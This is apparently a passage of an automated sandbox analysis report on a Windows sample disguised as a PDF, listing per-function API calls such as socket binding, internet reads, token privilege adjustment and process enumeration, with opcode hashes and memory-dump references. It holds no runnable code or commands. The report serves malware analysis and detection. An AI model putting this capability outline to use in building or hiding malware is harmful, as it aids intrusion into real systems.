                                                                          • _memmove.LIBCMT ref: 00B3062F
                                                                          • _memmove.LIBCMT ref: 00B30744
                                                                          • _memmove.LIBCMT ref: 00B307EB
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                          • String ID:
                                                                          • API String ID: 1300846289-0
                                                                          • Opcode ID: e86e3172e38ab90f40b0f4dbdd462e50f8c60621e5c0c7d8dace0d0fc3878923
                                                                          • Instruction ID: 46339b1878b10055f329f3c01235c93c025f4dd2eef784f3a78df14d7d220eae
                                                                          • Opcode Fuzzy Hash: e86e3172e38ab90f40b0f4dbdd462e50f8c60621e5c0c7d8dace0d0fc3878923
                                                                          • Instruction Fuzzy Hash: 48029F70E10209DBDF04EF69D991ABEBBF5EF44340F2480A9E906DB295EB31D950CB91
                                                                          APIs
                                                                            • Part of subcall function 00AE2612: GetWindowLongW.USER32(?,000000EB), ref: 00AE2623
                                                                          • DefDlgProcW.USER32(?,?,?,?,?), ref: 00AE19FA
                                                                          • GetSysColor.USER32(0000000F), ref: 00AE1A4E
                                                                          • SetBkColor.GDI32(?,00000000), ref: 00AE1A61
                                                                            • Part of subcall function 00AE1290: DefDlgProcW.USER32(?,00000020,?), ref: 00AE12D8
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: ColorProc$LongWindow
                                                                          • String ID:
                                                                          • API String ID: 3744519093-0
                                                                          APIs
                                                                            • Part of subcall function 00B580A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00B580CB
                                                                          • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00B56AB1
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00B56ADA
                                                                          • bind.WSOCK32(00000000,?,00000010), ref: 00B56B13
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00B56B20
                                                                          • closesocket.WSOCK32(00000000,00000000), ref: 00B56B34
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                          • String ID:
                                                                          • API String ID: 99427753-0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                          • String ID:
                                                                          • API String ID: 292994002-0
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00B21D88,?), ref: 00B5C312
                                                                          • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00B5C324
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                          • API String ID: 2574300362-1816364905
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: __itow__swprintf
                                                                          • String ID:
                                                                          • API String ID: 674341424-0
                                                                          APIs
                                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00B5F151
                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 00B5F15F
                                                                            • Part of subcall function 00AE7F41: _memmove.LIBCMT ref: 00AE7F82
                                                                          • Process32NextW.KERNEL32(00000000,?), ref: 00B5F21F
                                                                          • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00B5F22E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                          • String ID:
                                                                          • API String ID: 2576544623-0
                                                                          APIs
                                                                          • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00B440D1
                                                                          • _memset.LIBCMT ref: 00B440F2
                                                                          • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00B44144
                                                                          • CloseHandle.KERNEL32(00000000), ref: 00B4414D
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                          • String ID:
                                                                          • API String ID: 1157408455-0
                                                                          APIs
                                                                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00B3EB19
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: lstrlen
                                                                          • String ID: ($|
                                                                          • API String ID: 1659193697-1631851259
                                                                          APIs
                                                                          • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00B51AFE,00000000), ref: 00B526D5
                                                                          • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00B5270C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Internet$AvailableDataFileQueryRead
                                                                          • String ID:
                                                                          • API String ID: 599397726-0
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00000001), ref: 00B4B5AE
                                                                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00B4B608
                                                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00B4B655
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorMode$DiskFreeSpace
                                                                          • String ID:
                                                                          • API String ID: 1682464887-0
                                                                          APIs
                                                                            • Part of subcall function 00B00FF6: std::exception::exception.LIBCMT ref: 00B0102C
                                                                            • Part of subcall function 00B00FF6: __CxxThrowException@8.LIBCMT ref: 00B01041
                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B38D0D
                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B38D3A
                                                                          • GetLastError.KERNEL32 ref: 00B38D47
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                          • String ID:
                                                                          • API String ID: 1922334811-0
                                                                          APIs
                                                                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00B44C2C
                                                                          • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00B44C43
                                                                          • FreeSid.ADVAPI32(?), ref: 00B44C53
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                          • String ID:
                                                                          • API String ID: 3429775523-0
                                                                          • Opcode ID: edb3aa3477e4d592c9fed715cdfd31e62fa9f5b3bf41f6bc136b41566ecd2d4d
                                                                          • Instruction ID: 5b1c1f91aa32c251f33bfdf0c1f89e7fb10d0854cac672c193b9833ca3c93690
                                                                          • Opcode Fuzzy Hash: edb3aa3477e4d592c9fed715cdfd31e62fa9f5b3bf41f6bc136b41566ecd2d4d
                                                                          • Instruction Fuzzy Hash: AFF03775A11209BBDB04DFE0AD89ABEBBB8EB08201F0044A9E901E2181E6B46A048B50
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ac26032ba0afc84aa6ffc6d0539c1412020d921fe94d2a1d2f7e326f589e6499
                                                                          • Instruction ID: 8011434dffe465312f29077f6b6dfb3062e81eec63551e03835cfbe3c2494fea
                                                                          • Opcode Fuzzy Hash: ac26032ba0afc84aa6ffc6d0539c1412020d921fe94d2a1d2f7e326f589e6499
                                                                          • Instruction Fuzzy Hash: 0922C170A00256CFDB24DF59D480ABEBBF1FF08300F1485A9E85A9B395E735AD85CB91
                                                                          APIs
                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00B4C966
                                                                          • FindClose.KERNEL32(00000000), ref: 00B4C996
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Find$CloseFileFirst
                                                                          • String ID:
                                                                          • API String ID: 2295610775-0
                                                                          • Opcode ID: b7c540672fbf0f85dc2ecba5560b2dedbcbb9515c033c89f175eef7c56ce6ed7
                                                                          • Instruction ID: a7ba629d857a473b163ea66f13a14c6844f55b8707999cd7b1ac6120139d2d9d
                                                                          • Opcode Fuzzy Hash: b7c540672fbf0f85dc2ecba5560b2dedbcbb9515c033c89f175eef7c56ce6ed7
                                                                          • Instruction Fuzzy Hash: B51161726106009FD710EF29D845A2AFBE9FF84324F00855EF8A9D73A1DB74AD01CB81
                                                                          APIs
                                                                          • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00B5977D,?,00B6FB84,?), ref: 00B4A302
                                                                          • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00B5977D,?,00B6FB84,?), ref: 00B4A314
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFormatLastMessage
                                                                          • String ID:
                                                                          • API String ID: 3479602957-0
                                                                          • Opcode ID: 0eab1a7fb75a588e74ba092f67d4c32ffa76f043124c2a491ba01421bda50491
                                                                          • Instruction ID: 0eacea2cd135fd6a8395929735f76c2f5ca774e9267c9c7e197934d01ec4c727
                                                                          • Opcode Fuzzy Hash: 0eab1a7fb75a588e74ba092f67d4c32ffa76f043124c2a491ba01421bda50491
                                                                          • Instruction Fuzzy Hash: F4F0823554822DABDB109FA4DC48FEA77ADFF08761F0082A5F918D7181EA709A44CBA1
                                                                          APIs
                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00B38851), ref: 00B38728
                                                                          • CloseHandle.KERNEL32(?,?,00B38851), ref: 00B3873A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: AdjustCloseHandlePrivilegesToken
                                                                          • String ID:
                                                                          • API String ID: 81990902-0
                                                                          • Opcode ID: 52112ca5884e2eb4284e904d8f4955f752e5a9d9f2a0a5c527f18bd53b9fd5df
                                                                          • Instruction ID: 5af2d9f938106afd4ef2c7f936abecee78b2309a026b163d87151c0c4765a039
                                                                          • Opcode Fuzzy Hash: 52112ca5884e2eb4284e904d8f4955f752e5a9d9f2a0a5c527f18bd53b9fd5df
                                                                          • Instruction Fuzzy Hash: D4E0B676014611EEE7252B64FC09D777BE9EB04350B248869F496814B0DBA2AC90DB50
                                                                          APIs
                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00B08F97,?,?,?,00000001), ref: 00B0A39A
                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00B0A3A3
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled
                                                                          • String ID:
                                                                          • API String ID: 3192549508-0
                                                                          • Opcode ID: 065a8caed0d7096cbc5e1c4824f02eaf05cc1ec211b83b2ff21fc83e8a82d0ab
                                                                          • Instruction ID: cd7b914dc5b9083b53db049ae4c6fc14d312d75206e483b337b1245b45a576e0
                                                                          • Opcode Fuzzy Hash: 065a8caed0d7096cbc5e1c4824f02eaf05cc1ec211b83b2ff21fc83e8a82d0ab
                                                                          • Instruction Fuzzy Hash: 48B0923105820AABCA002B91FC09BA83F68EB44AA2F404020F70D862A0EFA654508A99
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 07af707e14b5e8cef7a4f970e6b21910381a22d22f8746d0aa420d347fc023aa
                                                                          • Instruction ID: 534c3eab7194cda88d90c10692a4f3de9253285fc67a3c789000bde8e7fcac0e
                                                                          • Opcode Fuzzy Hash: 07af707e14b5e8cef7a4f970e6b21910381a22d22f8746d0aa420d347fc023aa
                                                                          • Instruction Fuzzy Hash: 9632D122E69F424DD7339634D872335A699EFA63C4F15D737E819B6EA6EF2884C34100
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 58430cfc37dc2282771f18c17bfc81ed0ffcd595a0ed1451fbb931165d727e1e
                                                                          • Instruction ID: 6097341b42849f7a14f6be20856f2de49e329beabd26fe3063bdc99f782c59c3
                                                                          • Opcode Fuzzy Hash: 58430cfc37dc2282771f18c17bfc81ed0ffcd595a0ed1451fbb931165d727e1e
                                                                          • Instruction Fuzzy Hash: 8BB1F120D2AF414DD2639A398875336B69CAFFB2C5F92D71BFC1A75D22EB2185C34141
                                                                          APIs
                                                                          • __time64.LIBCMT ref: 00B48B25
                                                                            • Part of subcall function 00B0543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00B491F8,00000000,?,?,?,?,00B493A9,00000000,?), ref: 00B05443
                                                                            • Part of subcall function 00B0543A: __aulldiv.LIBCMT ref: 00B05463
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Time$FileSystem__aulldiv__time64
                                                                          • String ID:
                                                                          • API String ID: 2893107130-0
                                                                          • Opcode ID: 89c3d7f2bd3044f5cfec347c6a89d6b3d8d198d2677e2ffaf614444ceb8da2de
